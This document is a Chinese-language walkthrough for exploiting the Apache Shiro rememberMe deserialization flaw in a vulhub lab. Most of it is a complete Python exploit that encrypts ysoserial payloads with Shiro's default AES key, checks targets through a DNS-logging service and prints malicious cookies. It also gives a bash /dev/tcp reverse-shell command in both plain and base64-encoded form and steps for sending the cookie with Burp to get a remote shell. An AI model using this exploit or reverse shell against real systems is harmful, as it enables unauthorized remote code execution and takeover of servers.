0x00、原理说明
0x01、环境搭建
1、vulhub + docker
2、访问ip
0x02、漏洞利用
制作反弹shell
bash -i >& /dev/tcp/反弹IP/端口 0>&1
然后在 http://www.jackson-t.ca/runtime-exec-payloads.html 上进行java反序列化绕过base64编码
在监听机出监听反弹端口
构造恶意cookies
import os
import sys
import time
import json
import uuid
import base64
import argparse
import subprocess
from random import Random
from Crypto.Cipher import AES
from requests import Session
class ShiroExp:
# tstr = 'test.'
tstr = ''
session = Session()
def __init__(self, target):
self.target = target
def get_subd(self):
r = self.session.get('http://www.dnslog.cn/getdomain.php')
if r.status_code == 200:
self.subd = r.text
self.tstr += self.subd
print('dnslog SubDomain', self.subd)
return True
def test(self):
session = Session()
session.cookies['rememberMe'] = self.encode_rememberme("ping "+ self.tstr)
print('send payload')
session.post(self.target)
def check(self):
print('checking...')
for i in range(3):
time.sleep(1)
r = self.session.get("http://www.dnslog.cn/getrecords.php")
if r.status_code == 200:
if self.tstr in r.text:
print(f"[+] {self.target} 存在漏洞")
return True
print(f"[-] {self.target} 不存在漏洞")
def run(self):
self.get_subd()
self.test()
self.check()
def encode_rememberme(self, command):
popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar', 'CommonsBeanutils1', command], stdout=subprocess.PIPE)
BS = AES.block_size
pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
key = "kPH+bIxk5D2deZiIxcaaaA=="
mode = AES.MODE_CBC
iv = uuid.uuid4().bytes
encryptor = AES.new(base64.b64decode(key), mode, iv)
file_body = pad(popen.stdout.read())
base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
return base64_ciphertext.decode()
def run_poc(target):
exp = ShiroExp(target)
exp.run()
def run_exp(target, exp):
# tmp = "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwLjEvODg4OCAwPiYx}|{base64,-d}|{bash,-i}"
poc = ShiroExp(target)
print('rememberMe='+poc.encode_rememberme(exp))
if __name__ == '__main__':
parser = argparse.ArgumentParser(usage=f'\n\t{os.path.basename(sys.argv[0])} -p -t target\n\t{os.path.basename(sys.argv[0])} -c command')
parser.add_argument('-p', '--poc', action='store_true', help='对目标使用POC进行漏洞检测')
parser.add_argument('-c', '--command', action='store', help='生成EXP的命令')
parser.add_argument('-t', '--target', action='store', help='目标')
options = parser.parse_args()
if options.poc and options.target:
try:
run_poc(options.target)
except KeyboardInterrupt:
print('User Exit...')
exit()
elif options.command:
run_exp(options.target, options.command)
else:
parser.print_help()
# payload = encode_rememberme(sys.argv[1])
# with open("./payload.cookie", "w") as fpw:
# print("rememberMe={}".format(payload.decode()), file=fpw)
执行脚本获得cookie,这时候带上反弹shell的poc
使用burp抓包
替换cookies值
发送之后就可以在监听机出获得shell